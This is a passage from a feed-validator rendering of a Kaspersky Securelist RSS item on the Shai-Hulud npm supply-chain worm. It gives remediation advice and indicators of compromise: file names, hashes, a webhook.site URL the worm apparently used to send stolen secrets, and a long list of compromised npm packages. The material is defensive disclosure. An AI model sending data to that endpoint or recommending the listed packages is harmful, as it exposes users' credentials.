href="https://www.kaspersky.com/enterprise-security/xdr?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___xdr____33801aaaec3e63b3" target="_blank" rel="noopener">Kaspersky Next</a>, which allows you to build a flexible and effective security system. This product line provides threat visibility and real-time protection, as well as EDR and XDR capabilities for investigation and response. It is suitable for organizations of any scale or industry.</p><p>Kaspersky products detect the Shai-Hulud threat as <code>HEUR:Worm.Script.Shulud.gen</code>.</p><p>In the event of a Shai-Hulud infection, and as a proactive response to the spreading threat, we recommend taking the following measures across your systems and infrastructure:</p><ul><li>Use a reliable security solution to conduct a full system scan.</li><li>Audit your GitHub repositories:</li><ul><li>Check for repositories named <code>shai-hulud</code>.</li><li>Look for non-trivial or unknown branches, pull requests, and files.</li><li>Audit GitHub Actions logs for strings containing <code>shai-hulud</code>.</li></ul><li>Reissue npm and GitHub tokens, cloud keys (specifically for AWS and Google Cloud Platform), and rotate other secrets.</li><li>Clear the cache and inventory your npm modules: check for malicious ones and roll back versions to clean ones.</li><li>Check for indicators of compromise, such as files in the system or network artifacts.</li></ul><h2 id="indicators-of-compromise">Indicators of compromise</h2><p><strong>Files:</strong><br />bundle.js<br />shai-hulud-workflow.yml</p><p><strong>Strings:</strong><br />shai-hulud</p><p><strong>Hashes:</strong><br /><a href="https://opentip.kaspersky.com/c96fbbe010dd4c5bfb801780856ec228/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b82fb35982be9fef&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">C96FBBE010DD4C5BFB801780856EC228</a><br /><a href="https://opentip.kaspersky.com/78e701f42b76ccde3f2678e548886860/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2bd661a09cbb2bbb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">78E701F42B76CCDE3F2678E548886860</a></p><p><strong>Network artifacts:</strong><br /><a href="https://opentip.kaspersky.com/https%3a%2f%2fwebhook.site%2fbb8ca5f6-4175-45d2-b042-fc9ebb8170b7/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9bd279cc4ffc602e&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7</a></p><p><strong>Compromised packages:</strong><br />@ahmedhfarag/ngx-perfect-scrollbar<br />@ahmedhfarag/ngx-virtual-scroller<br />@art-ws/common<br />@art-ws/config-eslint<br />@art-ws/config-ts<br />@art-ws/db-context<br />@art-ws/di<br />@art-ws/di-node<br />@art-ws/eslint<br />@art-ws/fastify-http-server<br />@art-ws/http-server<br />@art-ws/openapi<br />@art-ws/package-base<br />@art-ws/prettier<br />@art-ws/slf<br />@art-ws/ssl-info<br />@art-ws/web-app<br />@basic-ui-components-stc/basic-ui-components<br />@crowdstrike/commitlint<br />@crowdstrike/falcon-shoelace<br />@crowdstrike/foundry-js<br />@crowdstrike/glide-core<br />@crowdstrike/logscale-dashboard<br />@crowdstrike/logscale-file-editor<br />@crowdstrike/logscale-parser-edit<br />@crowdstrike/logscale-search<br />@crowdstrike/tailwind-toucan-base<br />@ctrl/deluge<br />@ctrl/golang-template<br />@ctrl/magnet-link<br />@ctrl/ngx-codemirror<br />@ctrl/ngx-csv<br />@ctrl/ngx-emoji-mart<br />@ctrl/ngx-rightclick<br />@ctrl/qbittorrent<br />@ctrl/react-adsense<br />@ctrl/shared-torrent<br />@ctrl/tinycolor<br />@ctrl/torrent-file<br />@ctrl/transmission<br />@ctrl/ts-base32<br />@nativescript-community/arraybuffers<br />@nativescript-community/gesturehandler<br />@nativescript-community/perms<br />@nativescript-community/sentry<br />@nativescript-community/sqlite<br />@nativescript-community/text<br />@nativescript-community/typeorm<br />@nativescript-community/ui-collectionview<br />@nativescript-community/ui-document-picker<br />@nativescript-community/ui-drawer<br />@nativescript-community/ui-image<br />@nativescript-community/ui-label<br />@nativescript-community/ui-material-bottom-navigation<br />@nativescript-community/ui-material-bottomsheet<br />@nativescript-community/ui-material-core<br />@nativescript-community/ui-material-core-tabs<br />@nativescript-community/ui-material-ripple<br />@nativescript-community/ui-material-tabs<br />@nativescript-community/ui-pager<br />@nativescript-community/ui-pulltorefresh<br />@nstudio/angular<br />@nstudio/focus<br />@nstudio/nativescript-checkbox<br />@nstudio/nativescript-loading-indicator<br />@nstudio/ui-collectionview<br />@nstudio/web<br />@nstudio/web-angular<br />@nstudio/xplat<br />@nstudio/xplat-utils<br />@operato/board<br />@operato/data-grist<br />@operato/graphql<br />@operato/headroom<br />@operato/help<br />@operato/i18n<br />@operato/input<br />@operato/layout<br />@operato/popup<br />@operato/pull-to-refresh<br />@operato/shell<br />@operato/styles<br />@operato/utils<br />@teselagen/bio-parsers<br />@teselagen/bounce-loader<br />@teselagen/file-utils<br />@teselagen/liquibase-tools<br />@teselagen/ove<br />@teselagen/range-utils<br />@teselagen/react-list<br />@teselagen/react-table<br />@teselagen/sequence-utils<br />@teselagen/ui<br />@thangved/callback-window<br />@things-factory/attachment-base<br />@things-factory/auth-base<br />@things-factory/email-base<br />@things-factory/env<br />@things-factory/integration-base<br />@things-factory/integration-marketplace<br />@things-factory/shell<br />@tnf-dev/api<br />@tnf-dev/core<br />@tnf-dev/js<br />@tnf-dev/mui<br />@tnf-dev/react<br />@ui-ux-gang/devextreme-angular-rpk<br />@ui-ux-gang/devextreme-rpk<br />@yoobic/design-system<br />@yoobic/jpeg-camera-es6<br />@yoobic/yobi<br />ace-colorpicker-rpk<br />airchief<br />airpilot<br />angulartics2<br />another-shai<br />browser-webdriver-downloader<br />capacitor-notificationhandler<br />capacitor-plugin-healthapp<br />capacitor-plugin-ihealth<br />capacitor-plugin-vonage<br />capacitorandroidpermissions<br />config-cordova<br />cordova-plugin-voxeet2<br />cordova-voxeet<br />create-hest-app<br />db-evo<br />devextreme-angular-rpk<br />devextreme-rpk<br />ember-browser-services<br />ember-headless-form<br />ember-headless-form-yup<br />ember-headless-table<br />ember-url-hash-polyfill<br />ember-velcro<br />encounter-playground<br />eslint-config-crowdstrike<br />eslint-config-crowdstrike-node<br />eslint-config-teselagen<br />globalize-rpk<br />graphql-sequelize-teselagen<br />json-rules-engine-simplified<br />jumpgate<br />koa2-swagger-ui<br />mcfly-semantic-release<br />mcp-knowledge-base<br />mcp-knowledge-graph<br />mobioffice-cli<br />monorepo-next<br />mstate-angular<br />mstate-cli<br />mstate-dev-react<br />mstate-react<br />ng-imports-checker<br />ng2-file-upload<br />ngx-bootstrap<br />ngx-color<br />ngx-toastr<br />ngx-trend<br />ngx-ws<br />oradm-to-gql<br />oradm-to-sqlz<br />ove-auto-annotate<br />pm2-gelf-json<br />printjs-rpk<br />react-complaint-image<br />react-jsonschema-form-conditionals<br />react-jsonschema-form-extras<br />react-jsonschema-rxnt-extras<br />remark-preset-lint-crowdstrike<br />rxnt-authentication<br />rxnt-healthchecks-nestjs<br />rxnt-kue<br />swc-plugin-component-annotate<br />tbssnch<br />teselagen-interval-tree<br />tg-client-query-builder<br />tg-redbird<br />tg-seq-gen<br />thangved-react-grid<br />ts-gaussian<br />ts-imports<br />tvi-cli<br />ve-bamreader<br />ve-editor<br />verror-extra<br />voip-callkit<br />wdio-web-reporter<br />yargs-help-output<br />yoo-styles</p>]]></content:encoded> <wfw:commentRss>https://securelist.com/shai-hulud-worm-infects-500-npm-packages-in-a-supply-chain-attack/117547/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/25072805/shai-hulud-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/25072805/shai-hulud-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/25072805/shai-hulud-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/25072805/shai-hulud-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> </channel></rss> If you would like to create a banner that links to this page (i.e. this validation result), do the following:
Download the "valid RSS" banner.
Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)
Add this HTML to your page (change the image src attribute if necessary):
If you would like to create a text link instead, here is the URL you can use:
http://www.feedvalidator.org/check.cgi?url=https%3A//securelist.com/feed/
